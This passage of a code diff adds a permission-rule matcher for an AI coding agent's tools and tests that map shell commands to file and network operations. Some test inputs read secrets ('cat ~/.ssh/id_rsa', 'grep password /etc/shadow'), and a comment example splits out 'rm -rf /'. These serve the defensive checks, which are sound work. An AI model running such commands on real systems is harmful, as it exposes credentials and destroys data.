'grep_search', + Grep: 'grep_search', + GrepTool: 'grep_search', + search_file_content: 'grep_search', // legacy + SearchFiles: 'grep_search', // legacy display name + + // Glob tool — also matched by "Read" meta-category rules + glob: 'glob', + Glob: 'glob', + GlobTool: 'glob', + FindFiles: 'glob', // legacy display name + + // List Directory tool — also matched by "Read" meta-category rules + list_directory: 'list_directory', + ListFiles: 'list_directory', + ListFilesTool: 'list_directory', + ReadFolder: 'list_directory', // legacy display name + + // Memory tool + save_memory: 'save_memory', + SaveMemory: 'save_memory', + SaveMemoryTool: 'save_memory', + + // TodoWrite tool + todo_write: 'todo_write', + TodoWrite: 'todo_write', + TodoWriteTool: 'todo_write', + + // WebFetch tool + web_fetch: 'web_fetch', + WebFetch: 'web_fetch', + WebFetchTool: 'web_fetch', + + // WebSearch tool + web_search: 'web_search', + WebSearch: 'web_search', + WebSearchTool: 'web_search', + + // Task tool + task: 'task', + Task: 'task', + TaskTool: 'task', + + // Skill tool + skill: 'skill', + Skill: 'skill', + SkillTool: 'skill', + + // ExitPlanMode tool + exit_plan_mode: 'exit_plan_mode', + ExitPlanMode: 'exit_plan_mode', + ExitPlanModeTool: 'exit_plan_mode', + + // LSP tool + lsp: 'lsp', + Lsp: 'lsp', + LspTool: 'lsp', + + // Legacy edit tool name + replace: 'edit', + + // Agent (subagent) rules — "Agent" is a user-friendly alias for the Task tool. + // "Agent(Explore)" is parsed with toolName = "task" and specifier = "Explore" + Agent: 'task', +}; + +/** + * Shell tool canonical names. + */ +const SHELL_TOOL_NAMES = new Set(['run_shell_command']); + +/** + * File-reading tools — "Read" rules apply to all of these (best-effort). + * + * Per Claude Code docs: "Claude makes a best-effort attempt to apply Read rules + * to all built-in tools that read files like Grep and Glob." + */ +const READ_TOOLS = new Set([ + 'read_file', + 'grep_search', + 'glob', + 'list_directory', +]); + +/** + * File-editing tools — "Edit" rules apply to all of these. + * + * Per Claude Code docs: "Edit rules apply to all built-in tools that edit files." + */ +const EDIT_TOOLS = new Set(['edit', 'write_file']); + +/** + * WebFetch tools. + */ +const WEBFETCH_TOOLS = new Set(['web_fetch']); + +// ───────────────────────────────────────────────────────────────────────────── +// Tool name resolution & categorization +// ───────────────────────────────────────────────────────────────────────────── + +/** + * Resolve a raw tool name or alias to its canonical name. + * Returns the input unchanged if it is not in the alias map + * (e.g. MCP tool names are kept as-is). + */ +export function resolveToolName(rawName: string): string { + return TOOL_NAME_ALIASES[rawName] ?? rawName; +} + +/** + * Determine the specifier kind for a given canonical tool name. + * This tells the matching engine which algorithm to use for the specifier. + */ +export function getSpecifierKind(canonicalToolName: string): SpecifierKind { + if (SHELL_TOOL_NAMES.has(canonicalToolName)) { + return 'command'; + } + if (READ_TOOLS.has(canonicalToolName) || EDIT_TOOLS.has(canonicalToolName)) { + return 'path'; + } + if (WEBFETCH_TOOLS.has(canonicalToolName)) { + return 'domain'; + } + return 'literal'; +} + +/** + * Check whether a given tool (by canonical name) is covered by a rule's tool name, + * taking meta-categories into account. + * + * "Read" → resolves to "read_file", but also covers grep_search, glob, list_directory + * "Edit" → resolves to "edit", but also covers write_file + */ +export function toolMatchesRuleToolName( + ruleToolName: string, + contextToolName: string, +): boolean { + if (ruleToolName === contextToolName) { + return true; + } + // "Read" → covers all READ_TOOLS + if (ruleToolName === 'read_file' && READ_TOOLS.has(contextToolName)) { + return true; + } + // "Edit" → covers all EDIT_TOOLS + if (ruleToolName === 'edit' && EDIT_TOOLS.has(contextToolName)) { + return true; + } + return false; +} + +// ───────────────────────────────────────────────────────────────────────────── +// Rule parsing +// ───────────────────────────────────────────────────────────────────────────── + +/** + * Parse a raw permission rule string into a PermissionRule object. + * + * Supported formats: + * "ToolName" → matches all invocations of the tool + * "ToolName(specifier)" → fine-grained matching via specifier + * + * Tool-specific specifier semantics: + * "Bash(git *)" → shell command glob + * "Read(./secrets/**)" → gitignore-style path match + * "Edit(/src/**\/*.ts)" → gitignore-style path match + * "WebFetch(domain:x.com)" → domain match + * "Agent(Explore)" → subagent type literal match (alias for Task) + * "mcp__server__tool" → MCP tool (no specifier needed) + */ +export function parseRule(raw: string): PermissionRule { + const trimmed = raw.trim(); + + // Handle legacy `:*` suffix (deprecated, equivalent to ` *`) + // e.g. "Bash(git:*)" → "Bash(git *)" + const normalized = trimmed.replace(/:(\*)/, ' $1'); + + const openParen = normalized.indexOf('('); + + if (openParen === -1) { + // Simple tool name rule (no specifier) + const canonicalName = resolveToolName(normalized); + return { + raw: trimmed, + toolName: canonicalName, + }; + } + + const toolPart = normalized.substring(0, openParen).trim(); + const specifier = normalized.endsWith(')') + ? normalized.substring(openParen + 1, normalized.length - 1) + : undefined; + + const canonicalName = resolveToolName(toolPart); + const specifierKind = specifier ? getSpecifierKind(canonicalName) : undefined; + + return { + raw: trimmed, + toolName: canonicalName, + specifier, + specifierKind, + }; +} + +/** + * Parse an array of raw rule strings into PermissionRule objects, + * silently skipping any empty entries. + */ +export function parseRules(raws: string[]): PermissionRule[] { + return raws.filter((r) => r && r.trim()).map(parseRule); +} + +// ───────────────────────────────────────────────────────────────────────────── +// Minimum-scope rule generation +// ───────────────────────────────────────────────────────────────────────────── + +/** + * Map from canonical tool names to the preferred display names used in + * permission rule strings. + * + * Read tools all map to "Read" (meta-category) so a single rule covers the + * entire family (read_file, grep_search, glob, list_directory). + * Edit tools map to "Edit" (meta-category) covering edit + write_file. + * Other tools use their individual display alias. + */ +const CANONICAL_TO_RULE_DISPLAY: Readonly> = { + // Read meta-category + read_file: 'Read', + grep_search: 'Read', + glob: 'Read', + list_directory: 'Read', + // Edit meta-category + edit: 'Edit', + write_file: 'Edit', + // Shell + run_shell_command: 'Bash', + // Web + web_fetch: 'WebFetch', + web_search: 'WebSearch', + // Agent / Skill + task: 'Task', + skill: 'Skill', + // Others + save_memory: 'SaveMemory', + todo_write: 'TodoWrite', + lsp: 'Lsp', + exit_plan_mode: 'ExitPlanMode', +}; + +/** + * Get the human-friendly display name to use in a permission rule string + * for a given canonical tool name. + * + * Falls back to the canonical name itself for unknown tools (e.g. MCP tools). + */ +export function getRuleDisplayName(canonicalToolName: string): string { + return CANONICAL_TO_RULE_DISPLAY[canonicalToolName] ?? canonicalToolName; +} + +/** + * Tools whose parameter path points to a **file** (as opposed to a directory). + * + * For these tools the minimum-scope rule uses `path.dirname()` so the rule + * covers the containing directory rather than a single file — e.g. + * read_file("/Users/alice/.secrets") → `Read(//Users/alice)` + * + * Directory-targeted tools (list_directory, grep_search, glob) already receive + * a directory path, so they use it as-is. + */ +const FILE_TARGETED_TOOLS = new Set(['read_file', 'edit', 'write_file']); + +/** + * Build minimum-scope permission rule strings from a permission check context. + * + * This is the **single, centralised** function for generating rules to be + * persisted when a user selects "Always Allow". Rules follow the format + * `DisplayName(specifier)` where the specifier narrows the rule to the + * minimum scope required by the current invocation. + * + * Specifier selection by tool category: + * - **path** tools (Read/Edit): + * File-targeted tools (read_file, edit, write_file) use the **parent + * directory** so the rule covers the whole directory, not a single file. + * Directory-targeted tools (grep, glob, ls) use the directory as-is. + * The `//` prefix denotes an absolute filesystem path in the rule grammar. + * - **domain** tools (WebFetch): `WebFetch(example.com)` + * - **command** tools (Bash): `Bash(command)` — note: Shell already generates + * its own fine-grained rules via `extractCommandRules`; this is a fallback. + * - **literal** tools (Skill/Task): `Skill(name)` / `Task(type)` + * + * If no specifier is available the rule falls back to the bare display name + * (e.g. `Read`), which matches **all** invocations of that tool category. + * + * @param ctx - The permission check context (built in coreToolScheduler L4). + * @returns Array of rule strings (usually a single element). + */ +export function buildPermissionRules(ctx: PermissionCheckContext): string[] { + const canonicalName = resolveToolName(ctx.toolName); + const displayName = getRuleDisplayName(canonicalName); + const kind = getSpecifierKind(canonicalName); + + switch (kind) { + case 'command': + // Shell commands — fallback only; shell.ts provides its own rules via + // extractCommandRules which are more granular (per-simple-command). + if (ctx.command) { + return [`${displayName}(${ctx.command})`]; + } + return [displayName]; + + case 'path': + if (ctx.filePath) { + // For file-targeted tools, scope to the containing directory; + // for directory-targeted tools the path is already a directory. + const dirPath = FILE_TARGETED_TOOLS.has(canonicalName) + ? path.dirname(ctx.filePath) + : ctx.filePath; + // Use the `//` prefix for absolute filesystem paths in rule grammar. + // Append `/**` so the gitignore-style glob matches all files in the + // directory recursively (picomatch uses `**` for recursive descent). + // resolvePathPattern("//foo/**") → "/foo/**" — round-trips correctly. + const specifier = dirPath.startsWith('/') + ? `/${dirPath}/**` + : `${dirPath}/**`; + return [`${displayName}(${specifier})`]; + } + return [displayName]; + + case 'domain': + if (ctx.domain) { + return [`${displayName}(${ctx.domain})`]; + } + return [displayName]; + + case 'literal': + default: + if (ctx.specifier) { + return [`${displayName}(${ctx.specifier})`]; + } + return [displayName]; + } +} + +// ───────────────────────────────────────────────────────────────────────────── +// Shell command matching +// ───────────────────────────────────────────────────────────────────────────── + +/** + * Shell operator tokens that act as command boundaries. + * Ordered by length (longest first) for correct multi-char operator detection. + */ +const SHELL_OPERATORS = ['&&', '||', ';;', '|&', '|', ';']; + +/** + * Split a compound shell command into its individual simple commands + * by splitting on unquoted shell operators (&&, ||, ;, |, etc.). + * + * Returns an array of trimmed simple command strings. + * For simple commands (no operators), returns a single-element array. + * + * Examples: + * "git status && rm -rf /" → ["git status", "rm -rf /"] + * "ls -la | grep foo" → ["ls -la", "grep foo"] + * "echo 'a && b'" → ["echo 'a && b'"] (inside quotes) + * "a && b || c" → ["a", "b", "c"] + */ +export function splitCompoundCommand(command: string): string[] { + const commands: string[] = []; + let inSingle = false; + let inDouble = false; + let escaped = false; + let lastSplit = 0; + + for (let i = 0; i < command.length; i++) { + const ch = command[i]!; + + if (escaped) { + escaped = false; + continue; + } + if (ch === '\\') { + escaped = true; + continue; + } + if (ch === "'" && !inDouble) { + inSingle = !inSingle; + continue; + } + if (ch === '"' && !inSingle) { + inDouble = !inDouble; + continue; + } + if (inSingle || inDouble) { + continue; + } + + // Check for shell operators (longest match first) + for (const op of SHELL_OPERATORS) { + if (command.substring(i, i + op.length) === op) { + const segment = command.substring(lastSplit, i).trim(); + if (segment) { + commands.push(segment); + } + lastSplit = i + op.length; + i = lastSplit - 1; // -1 because the loop will i++ + break; + } + } + } + + // Add the last segment + const lastSegment = command.substring(lastSplit).trim(); + if (lastSegment) { + commands.push(lastSegment); + } + + return commands.length > 0 ? commands : [command]; +} + +/** + * Match a shell command against a glob pattern. + * + * Key semantics (from Claude Code docs): + * + * 1. `*` wildcard can appear at any position (head, middle, tail). + * + * 2. **Word boundary rule**: A space before `*` enforces a word boundary. + * - `Bash(ls *)` matches `ls -la` but NOT `lsof` + * - `Bash(ls*)` matches both `ls -la` and `lsof` + * + * 3. **Shell operator awareness**: Patterns don't match across operator + * boundaries. We extract only the first simple command before matching. + * + * 4. Without `*`, uses prefix matching for backward compatibility. + * `Bash(git commit)` matches `git commit -m "test"`. + * + * 5. `Bash(*)` is equivalent to `Bash` and matches any command. + */ +export function matchesCommandPattern( + pattern: string, + command: string, +): boolean { + // This function matches a single pattern against a single simple command. + // Compound command splitting is handled by the caller (PermissionManager). + + // Special case: lone `*` matches any single command + if (pattern === '*') { + return true; + } + + if (!pattern.includes('*')) { + // No wildcards: prefix matching (backward compat). + // "git commit" matches "git commit" and "git commit -m test" + // but NOT "gitcommit". + return command === pattern || command.startsWith(pattern + ' '); + } + + // Build regex from glob pattern with word-boundary semantics. + // + // We walk through the pattern character by character, building a regex. + // When we encounter `*`: + // - If preceded by a space: the space acts as a word boundary before `.*` + // - If preceded by non-space (or at start): `.*` with no boundary constraint + + let regex = '^'; + let pos = 0; + + while (pos < pattern.length) { + const starIdx = pattern.indexOf('*', pos); + if (starIdx === -1) { + // No more wildcards; rest is literal, then allow trailing args + regex += escapeRegex(pattern.substring(pos)); + break; + } + + // Add literal part before the `*` + const literalBefore = pattern.substring(pos, starIdx); + + if (starIdx > 0 && pattern[starIdx - 1] === ' ') { + // Word-boundary wildcard: "ls *" + // The literal includes the trailing space. The `*` matches + // anything after that space (including empty = just "ls"). + // But the key insight: "ls " was already committed, so + // `ls` alone without a trailing space should also match. + // + // Rewrite: literal without trailing space + (space + anything | end) + const literalWithoutTrailingSpace = literalBefore.slice(0, -1); + regex += escapeRegex(literalWithoutTrailingSpace); + regex += '( .*)?'; + } else { + // No word boundary: "ls*" → `ls` followed by anything + regex += escapeRegex(literalBefore); + regex += '.*'; + } + + pos = starIdx + 1; + } + + // If the pattern does NOT end with `*`, the regex already matches exactly. + // If it does end with `*`, the trailing `.*` handles it. + regex += '$'; + + try { + return new RegExp(regex).test(command); + } catch { + return command === pattern; + } +} + +/** + * Escape special regex characters. + */ +function escapeRegex(s: string): string { + return s.replace(/[.+?^${}()|[\]\\]/g, '\\$&'); +} + +// ───────────────────────────────────────────────────────────────────────────── +// File path matching (gitignore-style) +// ───────────────────────────────────────────────────────────────────────────── + +/** + * Resolve a path pattern from a permission rule specifier to an absolute + * glob pattern for matching. + * + * Path pattern prefixes (from Claude Code docs): + * + * | Prefix | Meaning | Example | + * |-----------|-----------------------------------|------------------------------| + * | `//path` | Absolute from filesystem root | `//Users/alice/secrets/**` | + * | `~/path` | Relative to home directory | `~/Documents/*.pdf` | + * | `/path` | Relative to project root | `/src/**\/*.ts` | + * | `./path` | Relative to current working dir | `./secrets/**` | + * | `path` | Relative to current working dir | `*.env` | + * + * WARNING: `/Users/alice/file` is NOT an absolute path — it's relative to + * the project root. Use `//Users/alice/file` for absolute paths. + */ +export function resolvePathPattern( + specifier: string, + projectRoot: string, + cwd: string, +): string { + if (specifier.startsWith('//')) { + // Absolute path from filesystem root: `//path` → `/path` + return specifier.substring(1); + } + + if (specifier.startsWith('~/')) { + // Relative to home directory + // Normalize homedir to forward slashes for cross-platform picomatch compatibility + return toPosixPath(path.join(os.homedir(), specifier.substring(2))); + } + + if (specifier.startsWith('/')) { + // Relative to project root (NOT absolute!) + return toPosixPath(path.join(projectRoot, specifier.substring(1))); + } + + if (specifier.startsWith('./')) { + // Relative to current working directory + return toPosixPath(path.join(cwd, specifier.substring(2))); + } + + // No prefix: relative to current working directory + return toPosixPath(path.join(cwd, specifier)); +} + +/** + * Match a file path against a gitignore-style path pattern. + * + * Uses picomatch for the actual glob matching, following gitignore semantics: + * - `*` matches files in a single directory (does not cross `/`) + * - `**` matches recursively across directories + * + * @param specifier - The raw specifier from the rule (e.g. "./secrets/**") + * @param filePath - The absolute path of the file being accessed + * @param projectRoot - The project root directory (absolute) + * @param cwd - The current working directory (absolute) + * @returns True if the file path matches the pattern + */ +export function matchesPathPattern( + specifier: string, + filePath: string, + projectRoot: string, + cwd: string, +): boolean { + const resolvedPattern = resolvePathPattern(specifier, projectRoot, cwd); + + // Normalize filePath to forward slashes for cross-platform picomatch compatibility. + // On Windows, incoming paths may use backslashes; picomatch expects forward slashes. + const normalizedFilePath = toPosixPath(filePath); + + // Use picomatch for gitignore-style matching + const isMatch = picomatch(resolvedPattern, { + dot: true, // Match dotfiles (e.g. .env) + nocase: false, // Case-sensitive (filesystem convention) + // Note: do NOT set bash: true — it makes `*` match across directories. + // Default picomatch behavior is gitignore-style: `*` = single dir, `**` = recursive. + }); + + return isMatch(normalizedFilePath); +} + +// ───────────────────────────────────────────────────────────────────────────── +// Domain matching (for WebFetch) +// ───────────────────────────────────────────────────────────────────────────── + +/** + * Match a domain against a WebFetch domain specifier. + * + * Specifier format: `domain:example.com` + * Matches the exact domain or any subdomain. + * + * Examples: + * matchesDomainPattern("domain:example.com", "example.com") → true + * matchesDomainPattern("domain:example.com", "sub.example.com") → true + * matchesDomainPattern("domain:example.com", "notexample.com") → false + */ +export function matchesDomainPattern( + specifier: string, + domain: string, +): boolean { + // Strip the "domain:" prefix if present + const pattern = specifier.startsWith('domain:') + ? specifier.substring(7).trim() + : specifier.trim(); + + if (!pattern || !domain) { + return false; + } + + const normalizedDomain = domain.toLowerCase(); + const normalizedPattern = pattern.toLowerCase(); + + // Exact match + if (normalizedDomain === normalizedPattern) { + return true; + } + + // Subdomain match: "sub.example.com" matches "example.com" + if (normalizedDomain.endsWith('.' + normalizedPattern)) { + return true; + } + + return false; +} + +// ───────────────────────────────────────────────────────────────────────────── +// MCP tool wildcard matching +// ───────────────────────────────────────────────────────────────────────────── + +/** + * Match an MCP tool name against a pattern that may contain wildcards. + * + * Per Claude Code docs: + * "mcp__puppeteer" matches any tool provided by the puppeteer server + * "mcp__puppeteer__*" wildcard syntax, also matches all tools from the server + * "mcp__puppeteer__puppeteer_navigate" matches only that exact tool + */ +function matchesMcpPattern(pattern: string, toolName: string): boolean { + if (pattern === toolName) { + return true; + } + + // Wildcard: patterns ending with "*" match by prefix. + // e.g. "mcp__server__*" matches all tools from that server, + // "mcp__chrome__use_*" matches all "use_*" tools from chrome. + if (pattern.endsWith('*')) { + const prefix = pattern.slice(0, -1); // strip trailing "*" + return toolName.startsWith(prefix); + } + + // Server-level match: "mcp__puppeteer" matches "mcp__puppeteer__anything" + // Only when the pattern has exactly 2 parts (mcp + server) and the tool has 3+ + const patternParts = pattern.split('__'); + const toolParts = toolName.split('__'); + if ( + patternParts.length === 2 && + toolParts.length >= 3 && + patternParts[0] === toolParts[0] && + patternParts[1] === toolParts[1] + ) { + return true; + } + + return false; +} + +// ───────────────────────────────────────────────────────────────────────────── +// Unified rule matching +// ───────────────────────────────────────────────────────────────────────────── + +/** + * Options for path-based matching, providing the directory context needed + * to resolve relative path patterns. + */ +export interface PathMatchContext { + /** The project root directory (absolute path). */ + projectRoot: string; + /** The current working directory (absolute path). */ + cwd: string; +} + +/** + * Check whether a parsed PermissionRule matches a given context. + * + * Matching logic depends on the tool and specifier type: + * + * 1. **Tool name matching**: + * - "Read" rules also match grep_search, glob, list_directory (meta-category). + * - "Edit" rules also match write_file (meta-category). + * - MCP tools support wildcard patterns (e.g. "mcp__server__*"). + * + * 2. **No specifier**: matches any invocation of the tool. + * + * 3. **With specifier** (depends on specifierKind): + * - `command`: Shell glob matching with word boundary & operator awareness + * - `path`: Gitignore-style file path matching (*, **) + * - `domain`: Domain matching for WebFetch + * - `literal`: Exact string match (for Agent subagent names, etc.) + * + * @param rule - The parsed permission rule + * @param toolName - The canonical tool name being checked + * @param command - Shell command (for Bash rules) + * @param filePath - Absolute file path (for Read/Edit rules) + * @param domain - Domain (for WebFetch rules) + * @param pathContext - Project root and cwd for resolving relative path patterns + */ +export function matchesRule( + rule: PermissionRule, + toolName: string, + command?: string, + filePath?: string, + domain?: string, + pathContext?: PathMatchContext, + specifier?: string, +): boolean { + const canonicalCtxToolName = resolveToolName(toolName); + + // ── MCP tool matching ──────────────────────────────────────────────── + if ( + rule.toolName.startsWith('mcp__') || + canonicalCtxToolName.startsWith('mcp__') + ) { + return matchesMcpPattern(rule.toolName, canonicalCtxToolName); + } + + // ── Standard tool name matching (with meta-category support) ───────── + if (!toolMatchesRuleToolName(rule.toolName, canonicalCtxToolName)) { + return false; + } + + // ── No specifier → match any invocation of the tool ────────────────── + if (!rule.specifier) { + return true; + } + + // ── Specifier matching (kind-dependent) ────────────────────────────── + const kind = rule.specifierKind ?? getSpecifierKind(rule.toolName); + + switch (kind) { + case 'command': { + if (command === undefined) { + return false; + } + return matchesCommandPattern(rule.specifier, command); + } + + case 'path': { + if (filePath === undefined) { + return false; + } + const ctx = pathContext ?? { + projectRoot: process.cwd(), + cwd: process.cwd(), + }; + return matchesPathPattern( + rule.specifier, + filePath, + ctx.projectRoot, + ctx.cwd, + ); + } + + case 'domain': { + if (domain === undefined) { + return false; + } + return matchesDomainPattern(rule.specifier, domain); + } + + case 'literal': + default: { + // Literal/exact matching (for Skill names, Agent subagent types, etc.) + const value = command ?? specifier; + if (value !== undefined) { + return value === rule.specifier; + } + return false; + } + } +} diff --git a/packages/core/src/permissions/shell-semantics.test.ts b/packages/core/src/permissions/shell-semantics.test.ts new file mode 100644 index 000000000..a58be8c14 --- /dev/null +++ b/packages/core/src/permissions/shell-semantics.test.ts @@ -0,0 +1,414 @@ +/** + * @license + * Copyright 2025 Qwen team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect } from 'vitest'; +import { extractShellOperations } from './shell-semantics.js'; +import type { ShellOperation } from './shell-semantics.js'; + +const CWD = '/home/user/project'; + +// Helper: sort ops for stable comparison +function sorted(ops: ShellOperation[]) { + return [...ops].sort((a, b) => + `${a.virtualTool}:${a.filePath ?? ''}:${a.domain ?? ''}`.localeCompare( + `${b.virtualTool}:${b.filePath ?? ''}:${b.domain ?? ''}`, + ), + ); +} + +describe('extractShellOperations', () => { + // ── Empty / no-op ────────────────────────────────────────────────────────── + + it('returns [] for empty string', () => { + expect(extractShellOperations('', CWD)).toEqual([]); + }); + + it('returns [] for whitespace', () => { + expect(extractShellOperations(' ', CWD)).toEqual([]); + }); + + it('returns [] for unknown commands', () => { + expect(extractShellOperations('frobnicate /etc/passwd', CWD)).toEqual([]); + }); + + it('returns [] for env-var assignments', () => { + expect(extractShellOperations('FOO=bar', CWD)).toEqual([]); + }); + + // ── cat ──────────────────────────────────────────────────────────────────── + + it('cat: absolute path', () => { + const ops = extractShellOperations('cat /etc/passwd', CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/passwd' }, + ]); + }); + + it('cat: relative path resolved against cwd', () => { + const ops = extractShellOperations('cat secrets.txt', CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: `${CWD}/secrets.txt` }, + ]); + }); + + it('cat: ~ expansion', () => { + const ops = extractShellOperations('cat ~/.ssh/id_rsa', CWD); + expect(ops[0]?.filePath).toMatch(/\/\.ssh\/id_rsa$/); + }); + + it('cat: multiple files', () => { + const ops = extractShellOperations('cat /a/b /c/d', CWD); + expect(sorted(ops)).toEqual([ + { virtualTool: 'read_file', filePath: '/a/b' }, + { virtualTool: 'read_file', filePath: '/c/d' }, + ]); + }); + + it('cat: flags are ignored', () => { + const ops = extractShellOperations('cat -n /etc/hosts', CWD); + expect(ops).toEqual([{ virtualTool: 'read_file', filePath: '/etc/hosts' }]); + }); + + it('cat: quoted path', () => { + const ops = extractShellOperations("cat '/etc/my file.conf'", CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/my file.conf' }, + ]); + }); + + // ── head / tail ──────────────────────────────────────────────────────────── + + it('head: -n value not treated as path', () => { + const ops = extractShellOperations('head -n 10 /var/log/syslog', CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: '/var/log/syslog' }, + ]); + }); + + it('tail: multiple files with flag', () => { + const ops = extractShellOperations('tail -c 100 /a /b', CWD); + expect(sorted(ops)).toEqual([ + { virtualTool: 'read_file', filePath: '/a' }, + { virtualTool: 'read_file', filePath: '/b' }, + ]); + }); + + // ── diff ─────────────────────────────────────────────────────────────────── + + it('diff: two files', () => { + const ops = extractShellOperations('diff /old /new', CWD); + expect(sorted(ops)).toEqual([ + { virtualTool: 'read_file', filePath: '/new' }, + { virtualTool: 'read_file', filePath: '/old' }, + ]); + }); + + // ── grep ─────────────────────────────────────────────────────────────────── + + it('grep: first positional is pattern, rest are files', () => { + const ops = extractShellOperations('grep password /etc/shadow', CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/shadow' }, + ]); + }); + + it('grep: -r becomes list_directory', () => { + const ops = extractShellOperations('grep -r secret /etc', CWD); + expect(ops).toEqual([{ virtualTool: 'list_directory', filePath: '/etc' }]); + }); + + it('grep: -e flag shifts all positionals to paths', () => { + const ops = extractShellOperations( + 'grep -e password /etc/passwd /etc/shadow', + CWD, + ); + expect(sorted(ops)).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/passwd' }, + { virtualTool: 'read_file', filePath: '/etc/shadow' }, + ]); + }); + + it('grep: -f patternfile — positionals are file paths', () => { + const ops = extractShellOperations('grep -f patterns.txt /etc/hosts', CWD); + // -f consumes patterns.txt; /etc/hosts is the only positional → first positional skipped? No. + // With -f, hasPatternFlag=true, so all positionals are file paths (no slice(1)) + expect(ops).toEqual([{ virtualTool: 'read_file', filePath: '/etc/hosts' }]); + }); + + it('grep: -A value not treated as path', () => { + const ops = extractShellOperations('grep -A 3 error /var/log/app.log', CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: '/var/log/app.log' }, + ]); + }); + + // ── ls / find ────────────────────────────────────────────────────────────── + + it('ls: no args defaults to cwd', () => { + const ops = extractShellOperations('ls', CWD); + expect(ops).toEqual([{ virtualTool: 'list_directory', filePath: CWD }]); + }); + + it('ls: explicit dir', () => { + const ops = extractShellOperations('ls /var/log', CWD); + expect(ops).toEqual([ + { virtualTool: 'list_directory', filePath: '/var/log' }, + ]); + }); + + it('find: first positional is starting dir', () => { + const ops = extractShellOperations('find /etc -name "*.conf"', CWD); + expect(ops).toEqual([{ virtualTool: 'list_directory', filePath: '/etc' }]); + }); + + it('find: no starting dir defaults to cwd', () => { + const ops = extractShellOperations('find -name "*.txt"', CWD); + expect(ops).toEqual([{ virtualTool: 'list_directory', filePath: CWD }]); + }); + + // ── touch / mkdir ────────────────────────────────────────────────────────── + + it('touch: creates a file (write_file)', () => { + const ops = extractShellOperations('touch /tmp/new.txt', CWD); + expect(ops).toEqual([ + { virtualTool: 'write_file', filePath: '/tmp/new.txt' }, + ]); + }); + + it('mkdir: creates a directory (write_file)', () => { + const ops = extractShellOperations('mkdir -p /tmp/a/b', CWD); + expect(ops).toEqual([{ virtualTool: 'write_file', filePath: '/tmp/a/b' }]); + }); + + // ── cp / mv ──────────────────────────────────────────────────────────────── + + it('cp: src=read, dst=write', () => { + const ops = extractShellOperations('cp /etc/passwd /tmp/backup', CWD); + expect(sorted(ops)).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/passwd' }, + { virtualTool: 'write_file', filePath: '/tmp/backup' }, + ]); + }); + + it('mv: src=edit, dst=write', () => { + const ops = extractShellOperations('mv /tmp/a /tmp/b', CWD); + expect(sorted(ops)).toEqual([ + { virtualTool: 'edit', filePath: '/tmp/a' }, + { virtualTool: 'write_file', filePath: '/tmp/b' }, + ]); + }); + + // ── rm ───────────────────────────────────────────────────────────────────── + + it('rm: single file is edit', () => { + const ops = extractShellOperations('rm /tmp/secret.txt', CWD); + expect(ops).toEqual([{ virtualTool: 'edit', filePath: '/tmp/secret.txt' }]); + }); + + it('rm -rf: directory is edit', () => { + const ops = extractShellOperations('rm -rf /tmp/dir', CWD); + expect(ops).toEqual([{ virtualTool: 'edit', filePath: '/tmp/dir' }]); + }); + + // ── chmod / chown ────────────────────────────────────────────────────────── + + it('chmod: mode arg is skipped, file is edit', () => { + const ops = extractShellOperations('chmod 755 /usr/local/bin/script', CWD); + expect(ops).toEqual([ + { virtualTool: 'edit', filePath: '/usr/local/bin/script' }, + ]); + }); + + it('chown: owner arg is skipped, file is edit', () => { + const ops = extractShellOperations('chown root:root /etc/config', CWD); + expect(ops).toEqual([{ virtualTool: 'edit', filePath: '/etc/config' }]); + }); + + // ── sed ──────────────────────────────────────────────────────────────────── + + it('sed without -i: read_file', () => { + const ops = extractShellOperations("sed 's/foo/bar/' /etc/hosts", CWD); + expect(ops).toEqual([{ virtualTool: 'read_file', filePath: '/etc/hosts' }]); + }); + + it('sed -i: edit', () => { + const ops = extractShellOperations("sed -i 's/foo/bar/' /etc/hosts", CWD); + expect(ops).toEqual([{ virtualTool: 'edit', filePath: '/etc/hosts' }]); + }); + + it('sed -e: all positionals are files', () => { + const ops = extractShellOperations("sed -e 's/foo/bar/' /a /b", CWD); + expect(sorted(ops)).toEqual([ + { virtualTool: 'read_file', filePath: '/a' }, + { virtualTool: 'read_file', filePath: '/b' }, + ]); + }); + + // ── awk ──────────────────────────────────────────────────────────────────── + + it('awk: program expression filtered, file identified', () => { + const ops = extractShellOperations("awk '{print $1}' /etc/passwd", CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/passwd' }, + ]); + }); + + it('awk -F: separator consumed, file identified', () => { + const ops = extractShellOperations("awk -F: '{print $2}' /etc/shadow", CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/shadow' }, + ]); + }); + + // ── dd ───────────────────────────────────────────────────────────────────── + + it('dd if= and of=', () => { + const ops = extractShellOperations('dd if=/dev/sda of=/tmp/disk.img', CWD); + expect(sorted(ops)).toEqual([ + { virtualTool: 'read_file', filePath: '/dev/sda' }, + { virtualTool: 'write_file', filePath: '/tmp/disk.img' }, + ]); + }); + + // ── Redirections ─────────────────────────────────────────────────────────── + + it('redirect >: write_file', () => { + const ops = extractShellOperations('echo hello > /tmp/out.txt', CWD); + expect(ops).toEqual([ + { virtualTool: 'write_file', filePath: '/tmp/out.txt' }, + ]); + }); + + it('redirect >>: write_file', () => { + const ops = extractShellOperations('date >> /var/log/app.log', CWD); + expect(ops).toEqual([ + { virtualTool: 'write_file', filePath: '/var/log/app.log' }, + ]); + }); + + it('redirect <: read_file', () => { + const ops = extractShellOperations('sort < /tmp/data.txt', CWD); + expect(ops).toContainEqual({ + virtualTool: 'read_file', + filePath: '/tmp/data.txt', + }); + }); + + it('combined redirect >file without space', () => { + const ops = extractShellOperations('echo hi >/tmp/foo', CWD); + expect(ops).toContainEqual({ + virtualTool: 'write_file', + filePath: '/tmp/foo', + }); + }); + + it('redirect 2>/dev/null: ignored (no op)', () => { + const ops = extractShellOperations('cat /etc/passwd 2>/dev/null', CWD); + expect(ops).not.toContainEqual( + expect.objectContaining({ filePath: '/dev/null' }), + ); + expect(ops).toContainEqual({ + virtualTool: 'read_file', + filePath: '/etc/passwd', + }); + }); + + // ── curl / wget ──────────────────────────────────────────────────────────── + + it('curl: extracts domain', () => { + const ops = extractShellOperations( + 'curl https://api.example.com/data', + CWD, + ); + expect(ops).toEqual([ + { virtualTool: 